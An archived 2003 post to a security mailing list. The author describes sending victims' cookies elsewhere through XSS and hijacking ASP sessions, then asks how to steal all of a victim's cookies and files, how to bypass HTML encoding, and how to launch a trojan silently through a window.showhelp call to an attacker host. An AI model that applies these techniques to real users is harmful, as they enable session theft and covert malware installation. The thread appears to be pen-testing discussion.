RE: Proof of Concept Tool on Web Application Security

From: Indian Tiger (indiantiger@mailandnews.com)
Date: Wed Apr 23 2003 - 03:20:54 EDT

• Next message: Ollie Whitehouse: "@stake port announcement: ncpquery for win32 now posted to razor.bindview.com"
• Previous message: Brian Serra: "Demo of WebDAV exploit with Trojan installation"
• Maybe in reply to: Indian Tiger: "Proof of Concept Tool on Web Application Security"
• Next in thread: Sam: "For Indian Tiger - Pen test lab"
• Reply: Sam: "For Indian Tiger - Pen test lab"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Hey Everybody,

First of all thank you very much to Robert, Rogan, Steve, Nicolas and Leah
for
their guidance to test XSS and Session ID brute force attack.

Now I can transfer victim’s cookie to another location successfully. I have
tested XSS to transfer cookie using following three ways:
1. Using document.location
2. Using Image src
3. Using hidden fields

The cookie, which I am getting, is of current application only mean If I am
accessing
www.hotmail.com I will be getting only Hotmail's session ID asigned to me
for that session.

Now how can I steal all cookies stored on the victim’s machine? or how to
transfer a file
from Victim machine using Client Side Scripting or any other way?

Some sites converts < and > tags into &lt; and &gt; to protect them selves
from XSS attacks. Is there any way to bypass this protection?

I was testing some trojan execution using XSS. In this process I was able to
run help file 31users.chm from attackers machine to victims machine as
follows:
window.showhelp(file:///XXX. XXX. XXX. XXX/c:/windows/help/31users.chm)
Is it possible to run some trojan or activex componenet instead of help
file?
Without alerting for any pop-up.
Is this possible to write some malicious help file? (These files not even
ask
before execution.)

As per IDefence’s Article on “Brute forcing Session ID” some time session ID
is random. I have tested this against six sites and I was not much lucky to
get session IDs in which only last 3-4 digits are changing.
What do you think in practice still are they so? Since iDEFENSE has
published
this research in Nov 2001 and current scenario might be a bit changed.

In my research of six sites, four sites were using ASP session variable to
generated session ID and remaining two their own.

I was able to hijack ASP sessions using session IDs. In my testing, first I
have logged in as user1, got his session ID and using user1’s session ID, I
was able to hijack user1.

Any help on this would be highly appreciated.

Thanking You.
Sincerely,

Indian Tiger, CISSP

---------------------------------------------------------------------------
Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the
world's premier event for IT and network security experts. The two-day
Training features 6 hand-on courses on May 12-13 taught by professionals.
The two-day Briefings on May 14-15 features 24 top speakers with no vendor
sales pitches. Deadline for the best rates is April 25. Register today to
ensure your place. http://www.securityfocus.com/BlackHat-pen-test
----------------------------------------------------------------------------

• Next message: Ollie Whitehouse: "@stake port announcement: ncpquery for win32 now posted to razor.bindview.com"
• Previous message: Brian Serra: "Demo of WebDAV exploit with Trojan installation"
• Maybe in reply to: Indian Tiger: "Proof of Concept Tool on Web Application Security"
• Next in thread: Sam: "For Indian Tiger - Pen test lab"
• Reply: Sam: "For Indian Tiger - Pen test lab"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:32 EDT